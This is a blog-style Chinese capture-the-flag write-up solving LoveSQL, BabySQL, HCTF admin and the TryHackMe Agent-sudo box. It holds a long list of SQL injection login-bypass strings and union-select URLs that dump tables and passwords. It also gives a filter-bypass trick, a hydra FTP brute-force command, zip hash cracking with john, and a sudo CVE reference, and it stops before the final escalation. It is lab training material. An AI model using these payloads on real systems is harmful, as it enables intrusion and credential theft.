Web 题记

[极客大挑战 2019]LoveSQL

看到这种就肯定先想到万能密码,试试,得到了用户名和密码

 总结了一些万能密码:

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1

接着就是常规的爆字段,爆表,爆爆爆!!!

/check.php?username=admin' order by 3%23&password=1
注意:此时是在url中输入的,所以不能用#,而用其url编码%23

 到4的时候报错了,那就是3个字段

/check.php?username=1' union select 1,2,3%23&password=1

/check.php?username=1' union select 1,database(),version()%23&password=1

数据库为geek,爆表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=1

 试一下l0ve1ysq1这个表

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'%23&password=1

爆数据

/check.php?username=1' union select 1,2,group_concat(password) from l0ve1ysq1%23&password=1

 [极客大挑战 2019]BabySQL

和上一个题目的界面一样,先试试万能密码, 发现不行,

 观察返回的发现or不见了,通过测试发现过滤了好多,双写绕过,通过union联合查询

?username=admin&password=admin' uunionnion sselectelect 1,2,3%23

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23

 [HCTF 2018]admin

两个功能,一个登陆一个注册 ,题目名字是admin,估计用户名就是admin,弱口令爆破一下

看到其他师傅还有很多解法,也学习一下:一题三解之2018HCTF&admin-安全客 - 安全资讯平台

【Tryhackme】Agent-sudo

nmap扫描开放的端口

 发现有三个开放的端口,先访问80端口

 访问网站需要修改User-Agent 为C才能触发到指定页面

bp抓包修改User-Agent

 根据这段文字可以看到一个用户名:chris,还有弱密码,那我们就来爆一下

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.24.83 -t 16 ftp

 登录ftp

 下载所有文件

 根据提示这俩张图片都不是真的图片,用binwalk看一下

可以看到里面隐藏了一个zip文件,需要密码

 使用john破解zip文件

zip2john 8702.zip > zip.hash        //获取hash
john zip.hash                    //破解hash

 破解出密码为alien

 用7z 解压缩

7z e 8702.zip

 解码这段字符串

 

用隐写工具steghide 验证jpg里是否有内容,Area51作为密钥

 得到用户名 : james 密码 : hackerrules!

ssh登录目标靶机

 得到userflag

 sudo -l 查看本账号超级权限,发现不可以用bash

CVE-2019-14287:

 因为box时间到了,后面就很简单,大概就参考这个

  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值